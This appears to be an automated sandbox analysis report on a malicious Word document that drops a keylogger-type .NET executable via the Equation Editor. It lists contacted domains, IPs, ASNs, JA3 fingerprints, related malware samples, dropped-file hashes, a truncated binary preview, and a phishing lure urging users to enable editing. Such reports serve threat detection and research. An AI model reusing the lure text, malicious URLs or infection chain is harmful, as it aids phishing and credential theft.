                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          reallyfreegeoip.orgTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          rREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 172.67.177.134
                                                                                          8038.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          #Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          movimiento_INGDIRECT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.97.3
                                                                                          Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 188.114.96.3
                                                                                          checkip.dyndns.comTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          rREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          8038.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 132.226.8.169
                                                                                          COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                          • 132.226.8.169
                                                                                          #Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          movimiento_INGDIRECT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.6.168
                                                                                          Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 158.101.44.242
                                                                                          api.telegram.orgTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          rREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Yeni Sipari#U015f.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 149.154.167.220
                                                                                          COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 149.154.167.220
                                                                                          ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          ORACLE-BMC-31898USrREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          #Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          movimiento_INGDIRECT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.6.168
                                                                                          sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 158.101.44.242
                                                                                          ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.6.168
                                                                                          ZEjcJZcrXc.elfGet hashmaliciousMiraiBrowse
                                                                                          • 193.122.239.124
                                                                                          na.elfGet hashmaliciousUnknownBrowse
                                                                                          • 130.61.64.122
                                                                                          na.elfGet hashmaliciousMiraiBrowse
                                                                                          • 130.35.12.7
                                                                                          na.elfGet hashmaliciousUnknownBrowse
                                                                                          • 130.61.69.123
                                                                                          TELEGRAMRUTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          rREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Yeni Sipari#U015f.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 149.154.167.220
                                                                                          COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Pla#U0107anje,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 149.154.167.220
                                                                                          ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          CLOUDFLARENETUSTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 188.114.96.3
                                                                                          Payment.vbsGet hashmaliciousFormBookBrowse
                                                                                          • 188.114.96.3
                                                                                          PAYMENT SPECIFIKACIJA 364846637-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                          • 188.114.97.3
                                                                                          RFQ 245801.exeGet hashmaliciousFormBookBrowse
                                                                                          • 188.114.96.3
                                                                                          original.emlGet hashmaliciousTycoon2FABrowse
                                                                                          • 188.114.96.3
                                                                                          https://globalairt.com/arull.php?7088797967704b536932307466507a53354b54456b744b3872584b3037555338375031633872445172564277413d1Get hashmaliciousUnknownBrowse
                                                                                          • 104.17.25.14
                                                                                          74qgPmarBM.exeGet hashmaliciousPonyBrowse
                                                                                          • 188.114.96.3
                                                                                          http://twbcompany.comGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.7.183
                                                                                          https://danielvasconcellos.com.br/cliente2024Get hashmaliciousPhisherBrowse
                                                                                          • 188.114.97.3
                                                                                          SecuriteInfo.com.Win64.Evo-gen.20301.32747.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.26.0.5
                                                                                          UTMEMUSTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          8038.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 132.226.8.169
                                                                                          COMPANY PROFILE_pdf.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                                          • 132.226.8.169
                                                                                          Quotation.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          2i3Lj7a8Gk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          VX7fQ2wEzC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          jHSDuYLeUl.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          na.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                          • 132.226.8.169
                                                                                          Quote_ECM129_ Kumbih III.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          05af1f5ca1b87cc9cc9b25185115607dinvoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                                          • 188.114.96.3
                                                                                          PO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                                          • 188.114.96.3
                                                                                          ls6sm8RNqn.rtfGet hashmaliciousRemcosBrowse
                                                                                          • 188.114.96.3
                                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                                          • 188.114.96.3
                                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                                          • 188.114.96.3
                                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                                          • 188.114.96.3
                                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                                          • 188.114.96.3
                                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                                          • 188.114.96.3
                                                                                          na.rtfGet hashmaliciousRemcosBrowse
                                                                                          • 188.114.96.3
                                                                                          na.rtfGet hashmaliciousUnknownBrowse
                                                                                          • 188.114.96.3
                                                                                          36f7277af969a6947a61ae0b815907a1MT103-93850.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          StatementXofXaccount.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          KBGC_1200O000000_98756.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          SCANNED COPY.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          58ADE05412907F657812BDA267C43288EA79418091.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          eMJ2QgQF4u.rtfGet hashmaliciousFormBookBrowse
                                                                                          • 149.154.167.220
                                                                                          QT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                          • 149.154.167.220
                                                                                          Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):0.34726597513537405
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlll:Nll
                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:@...e...........................................................

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\6FfzLi8FyhIIqWu[1].exe

                                                                                          Download File
                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):686080
                                                                                          Entropy (8bit):7.981187223026444
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:Asf0QaHSnkUu55iQ1hJ8migYslJqvGnCJU/bNHJSBQdS7a4JXJSqRF:As1sUu55rx5YsHqvGCO/bNHJiQdSFRF
                                                                                          MD5:384AA6D3431E34610390EA4F6AA37A17
                                                                                          SHA1:F8D784BF4D4737B3262895B31C9BF63CC69245C1
                                                                                          SHA-256:CD5B6D9887C45388175C80DEE322B7AD66A9F9D78B7A670232CF1427ED1072E5
                                                                                          SHA-512:AE9430398AEF04796A6527292627257DA5F275EC9F3E901B0F6FA07D41BFE042723D2830BDB3560F5FB19F5C03D83ABC5031F88DC78C100FAA6C6953AEC482B9
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Reputation:low
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9u.g..............0..n..........J.... ........@.. ....................................@.....................................O....................................u..T............................................ ............... ..H............text...Pl... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B................,.......H.......<9...............g...............................................0..1........~.......o.........,...s.....~......o........+..*&.(......*B.(........}....*..{....*.0...........(.............o....*Z.(........(.......+..*r.(....-.~.....(....o....+..*....0..X.......s....%..o.....%..o.....%...o.....%..$o.....%..Ho.....%..o.....%..$o..........s.........*..{....*"..}....*.~....*.0..m........s....}.....(........o.....+5..( .......(!....+...(......("...o#......%.Y......-....($..

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{64F71B58-7C88-4E8F-976B-583BE5676419}.tmp

                                                                                          Download File
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):16384
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3::
                                                                                          MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                          SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                          SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                          SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4C41869C-0672-4277-9509-12EF10C75296}.tmp

                                                                                          Download File
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):1024
                                                                                          Entropy (8bit):0.05390218305374581
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ol3lYdn:4Wn
                                                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A7973897-0E78-4B1F-8285-167A5C5D099C}.tmp

                                                                                          Download File
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):73216
                                                                                          Entropy (8bit):3.4809707363745916
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:ZgI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gIL:iSyemuSyemuSyemuSyemaFZ
                                                                                          MD5:581A347056D73F0BC481C57944695683
                                                                                          SHA1:6AC2F8400102380ED374F90F91629973222C3725
                                                                                          SHA-256:85A2A68DCDBD490F6D988091304367CB9169E872B25D851B5B62C179A9EE9085
                                                                                          SHA-512:138897D92B2EC6EC73FD4180D311AE7D5E55B82B4981C42239B40DCDB32156E6F41C660A53B26A5A2B3192A19E4869BC3D5D3BEDC7212A5E888C9926577BAEDA
                                                                                          Malicious:false
                                                                                          Preview:1.6.7.7.1.3.2.4.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{DD9DE08C-7041-4824-B993-3DB4AB7825DA}.tmp

                                                                                          Download File
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):1536
                                                                                          Entropy (8bit):1.3586208805849456
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbZ:IiiiiiiiiifdLloZQc8++lsJe1Mzi
                                                                                          MD5:139A66FCD75A5EBA1916E1A4944CDB23
                                                                                          SHA1:7D98698D7FF32C0D85AE997907D3092ED47C2745
                                                                                          SHA-256:05CD1035CEEDE438FAC23EB6F661DB4F4999A8625A11E8A7662E44608AB6E0BB
                                                                                          SHA-512:A45597B7EDB1222C603B79693267DB22A6EC78D15FFDC903982A8B69DD7656BE336EB5246D81CB9DCBE81E5393A72816322F503BAEBFDA53CB12F2128C2B34CA
                                                                                          Malicious:false
                                                                                          Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\afvoldkb.3oi.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Preview:1

                                                                                          C:\Users\user\AppData\Local\Temp\bgxfnx4r.io3.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Preview:1

                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO.LNK

                                                                                          Download File
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:10 2023, mtime=Fri Aug 11 15:42:10 2023, atime=Mon Oct 7 11:55:46 2024, length=716151, window=hide
                                                                                          Category:dropped
                                                                                          Size (bytes):968
                                                                                          Entropy (8bit):4.525261814149419
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:8z6q2E0gXg/XAlCPCHaXdBglLB/qPX+WRiIXhgicvbk0bIliDtZ3YilMMEpxRlju:8Gwk/XTty147iaDePQiDv3qx57u
                                                                                          MD5:9743FC7D605AD27488E4EF4B29A4563C
                                                                                          SHA1:C04286A17FEA321022225B288F3C5E2467907F35
                                                                                          SHA-256:4EA5916475120559EE5D1CDF1BD8013FCAAEF7DBCD29617D1C60397374870C11
                                                                                          SHA-512:6B0D357116C69020699CF3B6BED83C84BFCCC7E95EFE125F5C0CDDBD47FD5202BDEE840A780F6B201C0A5B2C242DA09593F86EFD0FC67629F55E21C00699F9C0
                                                                                          Malicious:false
                                                                                          Preview:L..................F.... ...no>.r...no>.r...?..9....w............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....GY.f..user.8......QK.XGY.f*...&=....U...............A.l.b.u.s.....z.1......WG...Desktop.d......QK.X.WG.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....P.2.w...GY.f .PO.doc..:.......WF..WF.*.........................P.O...d.o.c.......p...............-...8...[............?J......C:\Users\..#...................\\675052\Users.user\Desktop\PO.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......675052..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8...8.....[....

                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                          Download File
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                          File Type:Generic INItialization configuration [folders]
                                                                                          Category:dropped
                                                                                          Size (bytes):38
                                                                                          Entropy (8bit):4.195295934496219
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:M1gAYCm4YAYCv:MiAYlAYs
                                                                                          MD5:0FD0184C76178B5956870556C3435F52
                                                                                          SHA1:8114E3D26A78468039F4B59B362CA51D9ED1C6BF
                                                                                          SHA-256:B73556315E0C26F6A29361E43615B0620EEDF3F360358D20BAA8FE0E8D75E4D1
                                                                                          SHA-512:EBB9779224BB26E3AAAD20402F3659D3125C88482CE78DC631A6818C4C0416F7E6FE4BE624AE3AA9041E4A4C03E56CD751D0C57E00D807CE517DB8C0AC9E6541
                                                                                          Malicious:false
                                                                                          Preview:[doc]..PO.LNK=0..[folders]..PO.LNK=0..

                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                          Download File
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):162
                                                                                          Entropy (8bit):2.4797606462020307
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                          MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                          SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                          SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                          SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                          Malicious:false
                                                                                          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                                                                          Download File
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2
                                                                                          Entropy (8bit):1.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Qn:Qn
                                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                          Malicious:false
                                                                                          Preview:..

                                                                                          C:\Users\user\AppData\Roaming\obisfd.exe

                                                                                          Download File
                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):686080
                                                                                          Entropy (8bit):7.981187223026444
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:Asf0QaHSnkUu55iQ1hJ8migYslJqvGnCJU/bNHJSBQdS7a4JXJSqRF:As1sUu55rx5YsHqvGCO/bNHJiQdSFRF
                                                                                          MD5:384AA6D3431E34610390EA4F6AA37A17
